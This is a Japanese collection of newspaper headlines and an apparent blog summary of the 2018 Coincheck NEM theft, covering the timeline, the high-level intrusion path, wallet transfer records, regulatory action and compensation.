仮想通貨 リスクの説明、徹底を(社説)
手軽に投資 悔やむ若者 仮想通貨「上がればラッキー」一転
毎日新聞仮想通貨なぜ流出? ずさんな管理 被害拡大 被害者に返金の方針 規制強化の見方も
会見中も送金続く コインチェック 仮想通貨流出
東京新聞「仮想通貨 換金なら特定も」NEM財団、捜査協力へ
日本経済新聞「匿名コイン」悪用されやすく 取引履歴追えず コインチェックが取り扱い 金融庁、監視体制を調査
仮想通貨保険の対象外か 東京海上日動 コインチェック流出
産経新聞仮想通貨 全取引所を調査 コインチェック 9アドレスに流出
2018年1月31日(水)夕刊
新聞社見出し
読売新聞NEM流出 別の9口座へ送金 昨夜30分間 追跡逃れか(一面記事)
朝日新聞流出NEM 再び送金 仮想通貨 監視逃れる狙いか
毎日新聞流出仮想通貨 別口座へ 「ネム」監視かく乱狙いか(一面記事)
東京新聞仮想通貨流出絡み 取引所装う詐欺か ツイッターで書込み
日本経済新聞流出の仮想通貨が移動 「NEM」20口座に分散
2018年2月1日(木)朝刊
新聞社見出し
朝日新聞流出NNEM 別口座に再送金 流通網の混乱狙いか(一面記事)
毎日新聞口座間で11億円往復 仮想通貨流出 追跡警戒か 無関係者に送金も(一面記事)
東京新聞コインチェック 被害3億円増加か 仮想通貨 流出先から移動も
仮想通貨取引所 新規審査厳しく 金融庁検討 利用者保護徹底へ
コインチェック聞き取り調査へ 取引所などの業界団体
日本経済新聞仮想通貨「NEM」流出先 20アドレスに分散 追跡攪乱か、便乗詐欺も
取引所の新規審査厳格化へ 金融庁、不正アクセス排除
産経新聞コインチェック 流出補償 どう説明 仮想通貨 保険対象外か
仮想通貨自体の信頼性と別問題 日本取引所CEO
流出仮想通貨 闇サイト悪用恐れ イスラエル情報セキュリティ企業幹部
2018年2月1日(木)夕刊
新聞社見出し
読売新聞NEM流出 新たに4口座へ送金 1か所は米の取引所か
東京新聞通信記録、警視庁に提出 コインチェック 被害者団体結成へ
日本経済新聞通信記録、警視庁に提出 コインチェック 仮想通貨流出で
2018年2月2日(金)朝刊
新聞社見出し
読売新聞NEM流出 少額資金を断続送金 追跡状況探る狙いか
朝日新聞被害回復求め 中旬にも提訴 仮想通貨NEM流出
新たに送金
毎日新聞コインチェック 仮想通貨流出 金融庁きょう立ち入り(一面記事)
仮想通貨流出 海外取引所に送金 ネム財団発表 米など2カ所に形跡
被害対策弁護団 今月中にも提訴 払い戻し求め
通信データを警視庁に提出 コインチェック
東京新聞仮想通貨流出「複数国の当局捜査」財団理事 米、NZに送金確認
流出のNEM 「使用できず」財団発表
仮想通貨流出 識者に聞く
日本経済新聞仮想通貨流出 保管講座は特定 なぜ取り戻せず?
コインチェック 返金後は課税? 26万人に460億円
産経新聞仮想通貨流出 米取引所に新たに送金 ネム拡散捜査を攪乱
データ追跡 犯人特定長期化か
2018年2月2日(金)夕刊
新聞社見出し
読売新聞コインチェック立ち入り検査 金融庁 財務状況を確認
「財布」持ち主特定 難しく
NEM 流出1750万円分動く 分散口座から別口座へ
朝日新聞仮想通貨流出 コインチェックに立ち入り 金融庁 顧客への補償 調査(一面記事)
毎日新聞仮想通貨流出 コインチェックに立ち入り 金融庁 資金管理調査(一面記事)
東京新聞コインチェック立ち入り 金融庁、保証金を調査(一面記事)
日本経済新聞コインチェックに立ち入り 金融庁、資産管理など検査(一面記事)
全取引所に報告を命令 金融相(一面記事)
2018年2月3日(土)朝刊
新聞社見出し
読売新聞仮想通貨 取引所審査体制 強化へ 金融庁 資産管理状況を精査(一面記事)
仮想通貨 世界で逆風 相次ぐ盗難 ■ 投機対象 取引禁止や規制強化進む
コインチェック被害 金融庁異例 早期立ち入り 顧客へ補償 可能か確認
論点 仮想通貨 問われる存在意義
NEM流出 複数口座へ送金続く 発生1週間 返金めど立たず
朝日新聞仮想通貨 業者の監督強化 金融庁 コインチェックに立ち入り(一面記事)
仮想通貨 異例の早期検査 巨額流出1週間 市場の混乱 防ぐ狙いか 顧客保護制度追い付かず
不正アクセス視野、捜査 発信元特定へ長期化も
毎日新聞金融庁 仮想通貨監督強化 異例の早期立ち入り(一面記事)
ビットコイン 90万円割れ 規制強化、巨額流出が影響
東京新聞コインチェック常時監視 仮想通貨流出で金融庁 取引所3つの穴(一面記事)
日本経済新聞仮想通貨 未熟な「取引所」 巨額流出、利用者保護に遅れ 市場拡大、定着には課題(一面記事)
産経新聞仮想通貨流出 コインチェック常時監視 金融庁、立ち入り検査(一面記事)
コインチェック混乱収束不透明 出金再開なら引き出し集中も
仮想通貨流出 利用者「返金できるのか」金融庁検査に緊張走る
2018年2月4日(日)朝刊
新聞社見出し
読売新聞基礎からわかる仮想通貨 Qコインチェック流出なぜ 推奨の安全策とらず
返金求め被害者団体 訴訟も視野 顧客ら会合
朝日新聞NEM送金 海外も 監視逃れ換金狙いか
被害者団体設立 訴訟も視野
毎日新聞仮想通貨流出で 被害者団体結成 30人余り参加
東京新聞返金求め被害者団体 仮想通貨流出 30人余、訴訟も視野
日本経済新聞巨額流出で被害者団体 コインチェック問題 訴訟も視野 出金再開メド立たず
産経新聞返金求め被害者団体 仮想通貨流出 顧客ら30人、訴訟検討も
「安全だと…」怒りと不安 仮想通貨流出 投資額数倍の含み益も
2018年2月6日(火)朝刊
新聞社見出し
朝日新聞コインチェック 返金能力「検証」 麻生金融担当相が答弁
毎日新聞コインチェック決済停止 ビットコイン 現金化できず 利用店 対応追われ
「北朝鮮、仮想通貨奪う」数十億円分 韓国・国情院が報告
東京新聞仮想通貨「リップル」購入男性 コインチェックを提訴 60万円返還求め
仮想通貨の流出「北の仕業」推定 韓国国情院が国会報告
日本経済新聞コインチェック巨額流出 北朝鮮が関与か 韓国報道
コインチェックを提訴 利用者で初、出金停止巡り
産経新聞コインチェックを提訴 仮想通貨流出 顧客、購入費返還求め
NEM流出ショック コインチェック不正アクセス 1年で0.4→200円 含み益1億円も 価格高騰「面白うように増えた」
NEM流出ショック 落ちた仮想通貨の寵児
仮想通貨 580億円流出 北犯行か 韓国情報機関「韓国から26億円奪う」
2018年2月6日(火)夕刊
新聞社見出し
読売新聞コインチェック 顧客男性が提訴 他通貨出勤停止巡り
朝日新聞仮想通貨NEM流出 犯人は北朝鮮!? 韓国の国家情報院 可能性あると指摘
毎日新聞不正アクセス痕跡確認 コインチェック 流出との関連捜査
2018年2月7日(水)朝刊
新聞社見出し
読売新聞NEM流出 北が関与か 韓国情報機関が報告
残高確認 日に2度のみ コインチェック流出監視に不備
朝日新聞社内ネットに外部から接続か NEM不正流出
返還求め提訴
東京新聞仮想通貨の時価総額急減 1か月で3分の1 30.5兆円に 強まる規制 ネム流出も背景
日本経済新聞コインチェック流出、北朝鮮関与か 偽メールでサイバー攻撃
産経新聞仮想通貨返金「もうけ」あれば 所得税対象の可能性 財務相示唆
2018年2月7日(水)夕刊
新聞社見出し
日本経済新聞流出前 複数の不審接続 コインチェック
2018年2月8日(木)朝刊
新聞社見出し
読売新聞取引所2社立ち入りへ 仮想通貨 金融庁 安全対策を検査
問う仮想通貨 安全性・利便性 バランスを
NEM流出 他の仮想通貨交換 画策か 「闇サイト」接続先を送信
朝日新聞仮想通貨業者 立ち入りへ 金融庁 コインチェック以外 複数に
毎日新聞複数取引所立ち入り通告 金融庁 仮想通貨流出 コインチェック以外
東京新聞コインチェック以外 検査へ 金融庁 取引所数社を週内に
日本経済新聞金融庁の立ち入り検査 コインチェック以外も 体制の不備複数社浮上
産経新聞NEM不正送金先の口座所有者 闇ウェブで水禽洗浄?
仮想通貨取引所 週内にも複数検査
2018年2月8日(木)夕刊
新聞社見出し
読売新聞NEM 欧米から何度も不正接続 流出前 管理情報狙う?
毎日新聞闇ウェブで資金洗浄? 流出NEM 換金模索か
日本経済新聞ダークウェブで交換模索か 流出ネム、他の仮想通貨と
2018年2月9日(金)朝刊
新聞社見出し
朝日新聞盗んだNEM NZで入出金 他の通貨と交換狙いか(一面記事)
毎日新聞金融庁2取引所検査 仮想通貨 全社立ち入りへ(一面記事)
ネム流出直前に不正アクセスか 欧米から接続(一面記事)
仮想通貨に熱視線 不正流出 それでも人気!
日本経済新聞荒れる仮想通貨 専門家に聞く
別の仮想通貨に交換か 流出ネム、ダークウェブで 少なくとも数百万円分
産経新聞NEM流出 別の仮想通貨に交換か 780万円相当 資金洗浄疑い(一面記事)
NEM流出ショック コインチェック不正アクセス 「マウントゴックス」の再現
2018年2月9日(金)夕刊
新聞社見出し
朝日新聞NEM流出の2〜3日前 不正接続 欧米から相次ぐ
毎日新聞仮想通貨取引所 立ち入りに言及 麻生金融相
東京新聞コインチェックを提訴 通貨流出で顧客が損賠請求
日本経済新聞日本円出金、13日再開へ コインチェック 金融庁報告後に
「複数に立ち入り着手」仮想通貨流出で金融相
2018年2月10日(土)朝刊
新聞社見出し
読売新聞日本円の出金 13日再開発表 コインチェック
朝日新聞コインチェック 円の出金再開へ 13日から
毎日新聞コインチェック 出金再開 13日から 日本円300億円前後
仮想通貨流出 闇サイトで交換済みか 5億円分 資金洗浄の疑い
東京新聞流出ネム5億円交換か 別の仮想通貨に 資金洗浄狙う
日本経済新聞日本円の出金 13日に再開へ コインチェック
流出ネムの交換確認 5億円分か 監視逃れた可能性 警視庁
産経新聞日本円出金 13日再開 コインチェック 金融庁承認前提
別の仮想通貨交換 5億円に NEM流出 資金洗浄疑い
他の取引所は安全? 消費者不安払拭に躍起
2018年2月10日(土)夕刊
新聞社見出し
読売新聞NEM闇サイトで交換 警視庁確認 数億円分「洗浄」か
朝日新聞NEM 別通貨と交換 警視庁確認 一部が闇サイトで
毎日新聞ネムの一部 男性が交換 闇サイト 警視庁事情聴く
東京新聞流出ネム交換で聴取 警視庁 日本人、闇ウェブ利用
産経新聞流出NEM 日本人交換か 闇ウェブ利用 警視庁聴取(一面記事)
NEM流出ショック コインチェック不正アクセス 誤解招いた国の"お墨付き"
2018年2月13日(火)朝刊
新聞社見出し
読売新聞仮想通貨「規制強化を」 流出受け要求高まる
毎日新聞業務改善報告きょう提出 コインチェック 日本円出金再開へ
2018年2月13日(火)夕刊
新聞社見出し
読売新聞コインチェック 日本円出金再開
朝日新聞コインチェック 円出金再開 業務改善計画提出へ(一面記事)
毎日新聞コインチェック 円出金を再開
東京新聞コインチェック出金再開 仮想通貨流出から半月ぶり
日本経済新聞コインチェック、出金再開 日本円、NEM補償は未定
2018年2月14日(水)朝刊
新聞社見出し

|読売新聞 NEM流出改善計画提出 コインチェック 出金再開 400億円|

補償時期示さず コインチェック 顧客、含み損拡大か 営業再開へ課題山積み
NEM 闇交換で利ざや 第三者 割安購入の形跡
朝日新聞NEM 返金時期なお未定 コインチェック 改善計画を提出(一面記事)
仮想通貨 金融庁の誤算 成長促したが… 業者の不備次々
流出NEM分散 400以上の口座に
仮想通貨の急膨張「想定外」登録制導入にかかわった元金融庁企画官
毎日新聞コインチェック 流出仮想通貨 露の業者へ 犯人交換狙いか 闇ウェブ経由(一面記事)
円出金401億円に(一面記事)
仮想通貨流出 闇ウェブ取引 追跡難航 転売が活発化
業務適正化へ「規制」道半ば
手薄な顧客保護に課題 コインチェック 出金再開遅れ
補償は後日報告一問一答
東京新聞改善報告 内容明かさず コインチェック 金融庁に提出
コインチェックが業務改善報告 「正式に決まったらこたえたい」補償 示さぬまま
日本経済新聞日本円出金 401億円 コインチェック改善報告書を提出 NEM補償時期示さず
荒れる仮想通貨 専門家に聞く
産経新聞日本円401億円を出金 コインチェック 金融庁に改善計画(一面記事)
仮想通貨流出 補償・経営責任「言えない」 コインチェック取締役、原因も応えず
交換業者は不安解消へ躍起 管理強化アピール
2018年2月15日(木)朝刊
新聞社見出し
毎日新聞坂村健の目 「ブロックチェーン」の潜在能力
日本経済新聞仮想通貨取引にリスク意識を(社説)
2018年2月16日(金)朝刊
新聞社見出し
読売新聞コインチェック 集団提訴 顧客ら 1950万円分返還求める
朝日新聞「仮想通貨返還を」集団提訴 7顧客、コインチェックに
毎日新聞コインチェック 顧客ら集団提訴 仮想通貨返還求め
東京新聞コインチェックを集団提訴 顧客ら、1950万円分返還求め
日本経済新聞コインチェック 顧客らが提訴 「NEM」返還求め
産経新聞コインチェックを集団提訴 仮想通貨流出 1900万円分返還請求 東京地裁
2018年2月16日(金)朝刊
新聞社見出し
日本経済新聞仮想通貨NEM流出で余波 他社「事業開始遅れる」
産経新聞仮想通貨 みなし業者15社 金融庁 立ち入り検査へ
別の「みなし業者」に余波 仮想通貨流出 金融庁が審査厳格化 廃業の可能性も
2018年2月21日(水)夕刊
新聞社見出し
日本経済新聞NEM追う 善良ハッカー 協力者次々 解説サイトも 流出関与者 特定至らず
2018年2月22日(木)夕刊
新聞社見出し
朝日新聞コインチェック装うメール・電話にご注意
2018年2月24日(土)朝刊
新聞社見出し
読売新聞NEM流出 捜査本部設置へ
朝日新聞NEM流出 捜査本部設置へ
毎日新聞仮想通貨をどうすべきか 本質論抜きの帰省は誤る(社説)
ネム580億円流出 走査本文を設置 警視庁
産経新聞仮想通貨流出で 捜査本部設置へ 警視庁
2018年2月25日(日)朝刊
新聞社見出し
産経新聞仮想通貨 投機実態に応じた規制を(社説)
2018年2月27日(火)朝刊
新聞社見出し
読売新聞NEM流出前 不審通信 コインチェック 暗号鍵 漏えいか 発生1か月前 捜査本部設置(一面記事)
「交換業者」何故登録制?リスク審査で利用者保護
「みなし業者」審査苦慮 金融庁「登録拒否」通告も
朝日新聞NEM流出1か月 業界続くトラブル 仮想通貨 金融庁は監督強化
東京新聞闇サイトで170億円消失? ネム流出1か月 捜査100人規模
日本経済新聞迫真 コインチェック騒動1 「みなしでも営業できる」
産経新聞流出NEMの交換174億円か 警視庁 捜査本部設置
2018年2月27日(火)夕刊
新聞社見出し
東京新聞ネム流出前 不審接続複数回 欧米サーバーに 暗号情報漏えいか
日本経済新聞NEM流出前 不審通信 コインチェック社内から
2018年2月28日(水)朝刊
新聞社見出し
毎日新聞ネム流出 新たに提訴 東京地裁 被害者2弁護団 原告 計134人
日本経済新聞迫真 コインチェック騒動2 「どの業者も起こりえる」
産経新聞コインチェックNEM流出 132人が追加提訴
2018年3月1日(木)朝刊
新聞社見出し
日本経済新聞迫真 コインチェック騒動3 「流出NEM、追いかける」
2018年3月3日(土)朝刊
新聞社見出し
産経新聞セキュリティ最大手社長 「大量流出は防げた」新団体評価「必要なこと」
2018年3月8日(木)朝刊
新聞社見出し
読売新聞仮想通貨 複数業者処分へ 金融庁 一部は業務停止 検討
朝日新聞仮想通貨の交換 複数業者処分へ 金融庁 業務改善命令の方針
毎日新聞仮想通貨業者処分へ 安全対策不備の複数社 金融庁
東京新聞複数交換業者を処分へ 仮想通貨で顧客保護不十分 金融庁
日本経済新聞仮想通貨 複数社処分へ 金融庁 一部は業務停止(一面記事)
金融庁、仮想通貨で一斉処分 利用者保護を最優先(解説)
産経新聞仮想通貨 複数交換業者 処分へ 金融庁、週内にも業務停止
2018年3月8日(木)夕刊
新聞社見出し
読売新聞仮想通貨2社 業務停止 金融庁 5社には改善命令
朝日新聞「みなし」2社 業務停止 金融庁命令 仮想通貨 3社は廃業へ
毎日新聞仮想通貨2社業務停止 金融庁 計7社に改善命令
東京新聞仮想通貨2社 業務停止 金融庁 7社に行政処分(一面記事)
日本経済新聞仮想通貨7社 行政処分 金融庁、2社業務停止(一面記事)
コインチェックは2度目(一面記事)
2018年3月9日(金)朝刊
新聞社見出し
読売新聞「みなし」3社廃業へ 仮想通貨 金融庁、2社に業務停止(一面記事)
仮想通貨処分 ずさん資産管理続々 私的流用、資金洗浄恐れ
コインチェック 社長ら事業継続に意欲
「みなし業者」とは 登録申請中 管理面で懸念
NEM流出 英文メール介し感染 コインチェック被害 表劇型攻撃か
朝日新聞仮想通貨 来週にも返金 コインチェック 26万人に460億円
流出 ウイルス原因
7社に改善命令
毎日新聞ネム補償「来週めど」コインチェックが方針
流出の数週間前 社員宛メール
金融庁、業者「選別」強化 仮想通貨業務停止 利用者保護を徹底
東京新聞コインチェック 来週にも補償開始 金融庁 悪質2社に停止命令
仮想通貨7社に改善命令
信用失墜の危機 顧客保護置き去り
コインチェック一問一答 補償額は460億円 流出量基に算定
日本経済新聞仮想通貨 規制強化にカジ ずさん管理 7社処分 金融庁 顧客保護へ法改正視野
NEM流出 来週めど補償 コインチェック「経営責任を検討」
産経新聞仮想通貨2社 業務停止 金融庁 5社には改善命令(一面記事)
金融庁 スピード処分 仮想通貨交換業者 利用者保護促す
交換所相次ぐトラブル セキュリティー不備も
2018年3月10日(土)朝刊
新聞社見出し
日本経済新聞仮想通貨業者の選別が必要だ(社説)
2018年3月11日(日)朝刊
新聞社見出し
日本経済新聞不審通信、数週間前から NEM流出 ウイルスが発端か
2018年3月13日(火)朝刊
新聞社見出し
読売新聞NEM流出 補償実施 コインチェック発表 26万人に460億円
朝日新聞仮想通貨流出 460億円返金 コインチェック 引き出しも一部再開
毎日新聞コインチェック補償開始 仮想通貨流出 対象26万人、466億円
東京新聞コインチェック補償開始 仮想通貨、一部引き出しも
日本経済新聞売却・引き出し 一部再開 コインチェック NEM流出分を補償
産経新聞コインチェック 流出NEM 補償開始 26万人466億円、取引も再開
2018年3月21日(水)朝刊
新聞社見出し
読売新聞流出NEM 追跡停止 国際団体
朝日新聞盗まれたNEMの追跡終了
毎日新聞流出ネムの追跡 国際団体が断念 仮想通貨
東京新聞流出仮想通貨の追跡停止 ネム財団、理由明かさず
日本経済新聞流出NEM 追跡停止 コインチェック巡り財団
2018年3月24日(土)朝刊
新聞社見出し
朝日新聞流出NEM交換「興味本位だった」 男性、闇サイト通じ
2018年4月3日(火)夕刊
新聞社見出し
日本経済新聞コインチェック、支援要請 マネックスが買収案(一面)
2018年4月4日(水)朝刊
新聞社見出し
読売新聞コインチェック買収検討 ネット証券マネックス
コインチェック買収 マネックス 高手数料期待 短期間で市場シェア確保
朝日新聞コインチェック買収 ネット証券大手検討 仮想通貨流出受け再建
毎日新聞コインチェック買収案 マネックス参加で再建 信用回復へ経営陣刷新
東京新聞コインチェックを買収へ マネックスが再生目指す 買収額数十億円 週内にも発表
日本経済新聞仮想通貨業者 淘汰進む マネックス、コインチェック買収へ(一面)
産経新聞コインチェック買収へ マネックス、経営陣も派遣
2018年4月5日(木)夕刊
新聞社見出し
日本経済新聞コインチェック、出資受け入れ 社長にマネックスCOO(一面)
話題の株 マネックスグループ 仮想通貨事業、期待集める
2018年4月6日(金)朝刊
新聞社見出し
読売新聞コインチェック マネックス傘下入り 出資受け入れ 経営陣刷新へ
毎日新聞コインチェック新社長にマネックスCOO就任へ
東京新聞マネックスが社長を派遣へ コインチェックに
日本経済新聞コインチェックの再建手動 マネックス、経営権めざす
産経新聞コインチェックに社長派遣 マネックス きょう買収発表
2018年4月6日(金)夕刊
新聞社見出し
読売新聞コインチェック買収発表 マネックス 36億円、完全子会社化
朝日新聞コインチェックをマネックスが買収 36億円投じ完全子会社化
東京新聞コインチェック16日買収 マネックスの完全子会社に
日本経済新聞コインチェック買収発表 マネックスが36億円で全株
2018年4月7日(土)朝刊
新聞社見出し
読売新聞マネックスが買収発表 コインチェック 36億円、完全子会社化
仮想通貨 再編加速 監督強化 ずさん業者廃業 異業種大手の参入相次ぐ コインチェック買収
Q マネックスグループとは 傘下にネット証券大手
朝日新聞コインチェックを買収 マネックス 経営陣替え 再建へ
東京新聞コインチェック16日買収 2か月で全面再開目指す マネックス
日本経済新聞コインチェック 曲折の買収劇
コインチェック 高手数料頼み 収益構造に危うさも 460億円の補償完了
マネックス社長ら会見 コインチェック「IPOめざす」
産経新聞コインチェック買収36億円 マネックスが完全子会社化
仮想通貨で再成長狙う マネックス コインチェック買収
2018年4月10日(火)朝刊
新聞社見出し
日本経済新聞マネックスのコインチェック買収 銀行法の壁 悩む金融庁
2018年4月17日(火)朝刊
新聞社見出し
毎日新聞コインチェックの買収 マネックス「完了」発表
日本経済新聞コインチェック子会社化 マネックスが完了
産経新聞マネックス、コインチェック買収完了

Coincheckで発生した暗号通貨XEMの不正送金事案についてまとめてみた

2018年1月26日、コインチェック社が運営する取引所Coincheckにおいて、同社が管理するXEMが外部に送金される事案が発生しました。ここでは関連情報をまとめます。

コインチェック公式発表

プレス
ブログ
Twitter

インシデントタイムライン

日時出来事
2018年1月上旬コインチェックの社員に不審なメールが届く。*1
2018年1月23日、24日コインチェックのシステムに対し外部から不正なアクセスが発生。*2
同時期コインチェック社内から外部に対しての通信も発生。
2018年1月26日 0時02分頃コインチェックのアドレスから外部へXEMの不正送金が発生
〃 11時25分頃コインチェックが異常を検知。
〃 12時07分頃コインチェックがXEMの入金一時停止を発表。
〃 12時38分頃コインチェックがXEMの売買一時停止を発表。
〃 12時52分頃コインチェックがXEMの出金一時停止を発表。
〃 14時06分Twitter上でXEMの大量移動の記録が指摘される。
〃 14時40分頃コインチェックがNEM.io財団へ事態収束のためにコンタクト。*3
〃 16時33分頃コインチェックがすべての取引通貨の出金一時停止を発表。
〃 17時23分頃コインチェックがビットコイン以外の売買一時停止を発表。
〃 18時28分頃NEM.io財団代表がコインチェックの不正送金発生をインタビューで明らかにしたことが報じられる。*4
〃 18時50分頃コインチェックがクレジットカード、ペイジー、コンビニの入金一時停止を発表。
同日コインチェックが金融庁へ報告。
同日コインチェックが警視庁へ被害相談。
〃 23時30分頃コインチェックが記者会見。同社保有のXEMが外部へ流出したと発表。
〃 23時59分コインチェックがプロモーション緊急見直しを理由としてアフィリエイトを停止したとの情報
2018年1月27日 0時頃日本ブロックチェーン協会が不正送金事案に対してコメントを発表。
〃 3時57分NEM.io財団が不正送金されたXEMに対して自動追跡する仕組みを24〜48時間以内に導入するとTwitter上で報告
〃 13時36分不正送金をうけNEM.io財団のインタビュー動画公開。
〃 14時55分頃コインチェックがCoincheck paymentの一部機能を停止すると発表。
〃 17時Coincheck payment停止開始。
同日金融庁が国内すべての取引所運営会社へ注意文書を送付。*5
2018年1月28日 0時46分頃コインチェックが被害を受けた顧客への補償方針を発表。
〃 15時00分頃コインチェックがアフィリエイトプログラムを一時停止。
同日午後金融庁がコインチェック幹部から2時間半にわたり詳細報告を受領。*6
〃 23時30分頃コインチェックが入金可否の状況(日本円の入金は可能)を発表。
同日コインチェックが広告動画の掲載を取りやめ、Youtube上からも削除された模様。*7
2018年1月29日 午前金融庁がコインチェックに業務改善命令の行政処分。
〃 14時頃関東財務局がコインチェックの行政処分を発表。
同日午後警視庁がコインチェックの社員へ聞き取り。*8
同日日本仮想通貨事業者協会が広告の取り扱いに関する要請を発出。
2018年1月30日麻生財務・金融担当大臣が仮想通貨交換業者のシステム管理体制を強化する必要があるとの認識を示す。*9
〃 22時半頃不正送金されたアドレスから別のアドレスへ数回の送金行為が発生。
同日コインチェックが出金再開の見通しを数日中に案内すると発表。
2018年1月31日不正送金されたアドレスから別のアドレスへ送金行為が発生。
同日コインチェックの利用者が同社に対し購入費用の返還を求めて提訴。
同日午後警視庁へコインチェックから外部からの通信記録の提供。*10
2018年2月1日NEM.io財団が不正送金されたXEMの追跡の実施を発表。
同日コインチェック被害対策弁護団が結成され、Webサイトが公開*11
同日 10時35分頃コインチェックが不正送金の事象発生時間を訂正。*12
同日金融庁が国内の登録、および審査中の31取引所に対して報告徴求命令を発出。
2018年2月2日 8時頃金融庁がコインチェックを立ち入り検査。*13
2018年2月3日コインチェックが日本円の出金再開見通しとして、技術的安全性などの確認、検証中であることを発表。
同日コインチェックの顧客らが約30人が被害者団体を設立。*14
同日午後警視庁がコインチェックから社内サーバーのデータコピーを受領。*15
2018年2月7日自民党が金融庁からコインチェックの問題等の聞き取り。*16
同日金融庁が取引所2社に対し、立ち入り検査の通告。
2018年2月8日コインチェック利用者が同社に対し必要なセキュリティ対策をとっていなかった等として賠償を求める提訴。
2018年2月9日警察庁、金融庁、消費者庁の3省庁が局長級連絡会議を開催。
2018年2月13日金融庁が発出した業務改善命令に対しコインチェックが報告。
同日コインチェックが日本円での出金を再開。
2018年2月14日コインチェックの被害者弁護団が金融庁に対してコインチェックの報告書の情報開示請求。
2018年2月15日コインチェックの利用者(個人、法人)が同社に対し購入費用の返還を求めて集団提訴。
2018年2月26日警視庁が捜査本部を設置。
同日コインチェックの利用者が東京地裁に集団提訴。
2018年2月27日コインチェックの利用者が購入費用の返還を求めて集団提訴。
同日政府がコインチェックからの補償として支払われる日本円が課税所得になると答弁を閣議決定。*17
2018年3月8日金融庁がコインチェックに対し2回目の業務改善命令を発出。他6社に対しても業務停止命令、または業務改善命令を発出。
同日16時コインチェックが記者会見。補償開始時期の目処や不正アクセスの原因、再発防止策などを発表。
2018年3月12日コインチェックが不正送金されたNEMの補償開始、及び一部暗号通貨の売却・出金を再開。
2018年3月20日NEM.io財団が不正送金の追跡を停止したと発表。
2018年3月22日コインチェックが金融庁へ8日に受けた業務改善命令に対する計画書を提出。
同日ダークウェブ上で販売されていた盗難XEMの在庫全て売却され販売所が閉鎖された。
2018年4月6日コインチェックがマネックスグループの完全子会社になることを発表。
2018年4月16日マネックスがコインチェックの経営陣を刷新し、完全子会社化。

XEM外部流出の被害状況・影響

XEMの外部流出
同社の他サービス停止
他暗号通貨価格への影響

不正送金が発生した原因

コインチェックへ届いたメール

公式、報道情報からコインチェックに対し次のメールが届いたとみられる。

不正送金までの流れ

以下順序は想定を含むものです。

順序内容
第三者からコインチェック関係者に不審なメールが届く。
社内の人間がメール文面中に掲載されていたリンクをクリックし、社内関係者の端末をがマルウェア感染
第三者が外部から端末を踏み台に社内ネットワーク侵入
第三者が遠隔操作ツールによりXEMを管理していた社内サーバー上で通信傍受が行なわれた。
第三者の傍受によりNEMの管理に必要な秘密鍵が奪取された。
第三者が盗まれた秘密鍵を用いてXEMを大量に外部へ送金した。

その他関連する情報として報じられているものは以下です。

確認された通信先

外部への送金が行われたとみられる記録

NC4C6PSUW5CLTDT5SXAGJDQJGZNESKFK5MCN77OGへの送金記録
回数発生時間XEM送金額
1回目2018/1/26 0:0210
2回目2018/1/26 0:04100,000,000
3回目2018/1/26 0:06100,000,000
4回目2018/1/26 0:07100,000,000
5回目2018/1/26 0:08100,000,000
6回目2018/1/26 0:09100,000,000
7回目2018/1/26 0:1020,000,000
8回目2018/1/26 0:213,000,000
9回目2018/1/26 3:351,500,000
10回目2018/1/26 4:331,000,000
11回目2018/1/26 8:26800,000
 合計526,300,010
NC4C6PSUW5CLTDT5SXAGJDQJGZNESKFK5MCN77OGから別のアドレスへの送金記録
発生時間XEM送金額送金先のウォレットアドレス
2018/1/26 2:5730,000,000NCTWFIOOVITRZYSYIGQ3PEI3IMVB25KMED53EWFQ
2018/1/26 2:5850,000,000NA7SZ75KF6ZKK267TRKCJDJBWP5JKIC2HA5PXCKW
2018/1/26 3:0050,000,000NDODXOWEIZGJSMAEURXACF4IEHC2CB7Q6T56V7SQ
2018/1/26 3:02750,000NBKLQYXEIVEEGARYPUM62UJIFHA3Y6R4LAPU6NP4
2018/1/26 3:14100,000,000NDZZJBH6JZPYSWRPRYHALLWMITWHOYTQGXR53HAW
2018/1/26 3:18100,000,000NB4QJJCLTZWVFWRFBKEMFOONOZFDH3V5IDK3G524
2018/1/26 3:28100,000,000NDDZVF32WB3LWRNG3IVGHCOCAZWENCNRGEZJVCJI
2018/1/26 3:2992,250,000NA6JSWNF24Y7DVIUVPKRNAY7TPOFJJ7G2URL7KU5
2018/1/26 23:42300,000NCM6WE7SJFDVTLSPTMZGBUZUETDYINITILS3DCIZ
合計523,300,000
2018年1月30日夜に行われた送金

次の9つのアドレスに対しNC4C6PSUW5CLTDT5SXAGJDQJGZNESKFK5MCN77OGから送金行為が発生した。

No送金先アドレス送金額(XEM)送金回数過去にNC4…への送金状況
1NAUFIPHWAAFJWLE5C33WW36SI5BVDV32ODLFDFBK2003送金有り(2回)
2NBKCVZ2BU3D5XLUZD4BAI2EVIXE3MRYKEVINPWYQ1002送金有り
3NBY32IX3KZOPTVVAOVIP5TLWJZDQNTZ5HZ3L3NU31002送金有り
4NCGLWE2SVA5DP2X4TO7JBOM65PRIFZZPSPSHDGU42002送金有り
5NAZASOSA2DPAR5SRA3SNHUKBUZZGCDWYYWB6IFAY1001送金有り
6NBCWUSVIPYKIMORD272UDKXSSBLALN4CBOAUSBLQ1001無し
7NBXA6FYUETSRB5FXTXGLULQOEVFNOEPE7N4HATAR1001送金有り
8NCJQZIGJLMVPCOZAUUSI7V7BJ6MOGO2TTZCQFPHC1001送金有り
9NCMKWNFWUILEVCKBSON2MS65BXU4NJ2GBJTIJBTK1001送金有り

海外取引所などへの送金
取引所送金時期送金額
Poloniex2018年2月1日約6万円
Crytopia2018年2月1日約33万円
Appsolutely2018年2月1日約6万円
Changelly2018年2月1日約7万円
2月2日 DASHへの資金洗浄を探る動き

こんにちは。すみませんお詫びがあります。。匿名ネットワークで取引所を経由している最中に、メッセージを暗号化して送ってしまい、着金に送れが発生してしまいました。少し時間がかかるかもしれません。。ただ洗浄のルートは確立できましたので、次回からはスムーズに行えるかと思います。取り急ぎ、DASHの送金確認をするために、こちらのアドレス(Xr6maJSptxgD6NRBRqnv4YwsqoJvhLc7iB)へ、0.01DASHをお送りしました。着金が出来ているかのご確認をお願いします。txid:e6e8d429afa99b6708e187a3899460a05074ed2090e5d6516cd5a2695160b8df

2月6日 XEMを換金出来る取引所をHidden Service上に開設

取引所関連の動きは以下にまとめています。

2月7日 不正送金先のウォレットがNamespaceを作成
2月11日 一次送金元ウォレットからメッセージ送出
i cannot help you!! ok!!!!!!!!!!!!!

不正送金被害に対する顧客への補償

コインチェックのXEMの管理状況

コインチェックの暗号通貨の管理状況 (判明分のみ掲載)
暗号通貨被害発生時の管理状況
ビットコインコールドウォレットにて管理、マルチシグを実装
イーサリアムコールドウォレットにて管理(イーサリアムはマルチシグ機能無し)
XEMホットウォレットにて管理、マルチシグは実装されておらず
